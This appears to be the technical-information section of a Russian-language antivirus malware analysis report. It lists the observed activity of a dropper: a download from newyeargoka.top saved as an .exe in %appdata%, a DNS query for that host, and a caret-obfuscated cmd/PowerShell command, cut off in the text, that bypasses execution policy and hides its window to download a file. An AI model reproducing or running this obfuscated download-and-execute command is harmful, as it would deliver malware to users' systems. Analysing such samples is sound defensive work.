Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^W^ErSHel^L.ExE ^-e^XeC^u^tio^N^pO^liCy^ bY^pa^s^s^ -NoPR^o^fiL^e ^-wI^N^do^wS^ty^Le^ HIDDEN (^N^e^W-OBjeCt^ ^sY^STEM.NET.WEBCl^ieNt).^do^WNL^oAD^file^('http://newyea...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "PO^W^ErSHel^L.ExE ^-e^XeC^u^tio^N^pO^liCy^ bY^pa^s^s^ -NoPR^o^fiL^e ^-wI^N^do^wS^ty^Le^ HIDDEN (^N^e^W-OBjeCt^ ^sY^STEM.NET.WEBCl^ieNt).^do^WNL^oAD^file^('http://newyea...' (со скрытым окном)